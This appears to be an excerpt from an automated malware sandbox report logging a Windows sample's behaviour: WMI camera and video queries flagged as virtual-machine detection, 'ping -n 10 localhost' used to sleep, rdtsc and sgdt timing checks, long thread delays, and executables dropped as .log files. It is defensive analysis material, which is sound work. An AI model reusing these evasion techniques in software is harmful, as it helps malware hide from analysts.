Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Memory allocated: C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Memory allocated: 1ACC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Memory allocated: 13E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Memory allocated: 1B260000 memory reserve \| memory write watch	Jump to behavior

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

Code function: 5_2_00007FF84904340F rdtsc

5_2_00007FF84904340F

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Code function: 12_2_00007FF849976398 sgdt fword ptr [eax]

12_2_00007FF849976398

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 599719	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 598153	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 593828	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 593313	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 592688	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 592391	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 592215	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 591953	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 591234	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 590734	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 590375	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 590016	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 589719	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 589297	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 588969	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 588616	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 588422	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 588121	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 587688	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 587341	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 587205	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 587078	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586953	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586844	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586714	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586609	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586500	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586359	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586213	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585942	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585813	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585696	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585578	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585469	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585359	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585209	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585078	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 584969	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Window / User API: threadDelayed 5789			Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Window / User API: threadDelayed 3773			Jump to behavior

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hgxdViOd.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YuFVHGXq.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LVvPQgSP.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rOQtFLTL.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oitSpyyv.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lWnUcfOW.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IZCgKuwL.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zFRrKozb.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uwXRiYty.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jaztMisT.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VMyxesyD.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WsSnlWTv.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\STjOtvME.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NkZFHznt.log	Jump to dropped file
